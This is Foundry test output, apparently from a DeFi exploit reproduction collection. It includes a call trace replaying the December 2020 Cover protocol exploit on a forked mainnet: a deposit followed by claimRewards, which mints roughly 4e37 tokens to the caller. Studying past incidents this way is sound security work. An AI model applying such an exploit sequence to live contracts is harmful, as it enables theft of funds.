Compiling 21 files with Solc 0.8.28
Compiling 20 files with Solc 0.8.10
Solc 0.8.28 finished in 972.11ms
Solc 0.8.10 finished in 1.21s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.73s (20.54ms CPU time)

Ran 1 test for src/test/2020-12/Cover_exp.sol:ContractTest
[PASS] test() (gas: 140811)
Logs:
  Deposit BPT: 15255552810089260015361
  After claimRewards, Cover Balance: 40316176729922452045213336697791916580

Traces:
  [5845] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 11542309 [1.154e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [151211] ContractTest::test()
    ├─ [0] VM::prank(0x00007569643bc1709561ec2E86F385Df3759e5DD)
    │   └─ ← [Return]
    ├─ [98528] 0xE0B94a7BB45dD905c79bB1992C9879f40F1CAeD5::deposit(0x59686E01Aa841f622a43688153062C2f24F8fDed, 15255552810089260015361 [1.525e22])
    │   ├─ [2579] 0x59686E01Aa841f622a43688153062C2f24F8fDed::balanceOf(0x00007569643bc1709561ec2E86F385Df3759e5DD) [staticcall]
    │   │   └─ ← [Return] 15255552810089260015361 [1.525e22]
    │   ├─ [2579] 0x59686E01Aa841f622a43688153062C2f24F8fDed::balanceOf(0xE0B94a7BB45dD905c79bB1992C9879f40F1CAeD5) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [17127] 0x59686E01Aa841f622a43688153062C2f24F8fDed::transferFrom(0x00007569643bc1709561ec2E86F385Df3759e5DD, 0xE0B94a7BB45dD905c79bB1992C9879f40F1CAeD5, 15255552810089260015361 [1.525e22])
    │   │   ├─ emit Transfer(from: 0x00007569643bc1709561ec2E86F385Df3759e5DD, to: 0xE0B94a7BB45dD905c79bB1992C9879f40F1CAeD5, value: 15255552810089260015361 [1.525e22])
    │   │   ├─ emit Approval(owner: 0xE0B94a7BB45dD905c79bB1992C9879f40F1CAeD5, spender: 0xE0B94a7BB45dD905c79bB1992C9879f40F1CAeD5, value: 999999969488894379821479969277 [9.999e29])
    │   │   ├─  storage changes:
    │   │   │   @ 0xdfdfddb165fa2cf289b0be9924635109df1cf4033a6e732c6b533f1d0ba784b5: 0x00000000000000000000000000000000000000000000033b01532564ae945f01 → 0
    │   │   │   @ 0x2d89ce290bb9a72248489ca2733d4a0eb0c53c1487eeec5b2694c5c10517610c: 1 → 0x00000000000000000000000000000000000000000000033b01532564ae945f02
    │   │   │   @ 0xe759993ba50b3015fbba9970b2cc82948397063ffa169ebe79008329f3f1fd50: 0x000000000000000000000000000000000000000c9f2c99954521c885916ba0fe → 0x000000000000000000000000000000000000000c9f2c965a43cea320e2d741fd
    │   │   └─ ← [Return] true
    │   ├─ emit Deposit(param0: 0x00007569643bc1709561ec2E86F385Df3759e5DD, param1: 0x59686E01Aa841f622a43688153062C2f24F8fDed, param2: 15255552810089260015361 [1.525e22])
    │   ├─  storage changes:
    │   │   @ 0x64a5e0b115b018a1ebb0390a08b53561a3cad48ecb7e7974bfaab98523e3c5d0: 1 → 0x00000000000000000000000000000000000000000000033b01532564ae945f02
    │   │   @ 0x8fba88580862a6fefbe2fab2de46c689ed861550be2c80fca8b7754d6e90ffb9: 0x00000000000000000000000000000000000000000000000000000000c8d64e7c → 0x0000000000000000000000000000000000000000088a02092d7c6ecc6f5e78aa
    │   │   @ 0x8fba88580862a6fefbe2fab2de46c689ed861550be2c80fca8b7754d6e90ffba: 0x000000000000000000000000000000000000000000000000000000005fe9c880 → 0x000000000000000000000000000000000000000000000000000000005fe9c8d4
    │   │   @ 0x64a5e0b115b018a1ebb0390a08b53561a3cad48ecb7e7974bfaab98523e3c5d1: 0 → 0x000000000000000000000000000000000000000000000002c95d91d502ec923e
    │   └─ ← [Stop]
    ├─ emit log_named_uint(key: "Deposit BPT", val: 15255552810089260015361 [1.525e22])
    ├─ [0] VM::prank(0x00007569643bc1709561ec2E86F385Df3759e5DD)
    │   └─ ← [Return]
    ├─ [30164] 0xE0B94a7BB45dD905c79bB1992C9879f40F1CAeD5::claimRewards(0x59686E01Aa841f622a43688153062C2f24F8fDed)
    │   ├─ [17019] 0x5D8d9F5b96f4438195BE9b99eee6118Ed4304286::mint(0x00007569643bc1709561ec2E86F385Df3759e5DD, 40316176729922452045196567183920954062 [4.031e37])
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x00007569643bc1709561ec2E86F385Df3759e5DD, value: 40316176729922452045196567183920954062 [4.031e37])
    │   │   ├─  storage changes:
    │   │   │   @ 3: 0x0000000000000000000000000000000000000000000011f9fb6ea7c4613907e6 → 0x000000000000000000000000000000001e549cfab93571bd292bf8b0566882b4
    │   │   │   @ 0xb97d9b9900dafcd534aa819e419d9a5d62a8dac8e2e49bc90c228c43dff1f261: 0x000000000000000000000000000000000000000000000000003b93c8b555af56 → 0x000000000000000000000000000000001e549cfab9355fc32df8e4b4aa852a24
    │   │   └─ ← [Stop]
    │   ├─  storage changes:
    │   │   @ 0x64a5e0b115b018a1ebb0390a08b53561a3cad48ecb7e7974bfaab98523e3c5d1: 0x000000000000000000000000000000000000000000000002c95d91d502ec923e → 0x000000000000000000000000000000001e549cfab9355fc5f71ae2c0f81c0d0c
    │   └─ ← [Stop]
    ├─ [465] 0x5D8d9F5b96f4438195BE9b99eee6118Ed4304286::balanceOf(0x00007569643bc1709561ec2E86F385Df3759e5DD) [staticcall]
    │   └─ ← [Return] 40316176729922452045213336697791916580 [4.031e37]
    ├─ emit log_named_uint(key: "After claimRewards, Cover Balance", val: 40316176729922452045213336697791916580 [4.031e37])
    ├─  storage changes:
    │   @ 0xe759993ba50b3015fbba9970b2cc82948397063ffa169ebe79008329f3f1fd50: 0x000000000000000000000000000000000000000c9f2c99954521c885916ba0fe → 0x000000000000000000000000000000000000000c9f2c965a43cea320e2d741fd
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.62s (9.53s CPU time)

Ran 2 test suites in 14.82s (17.35s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
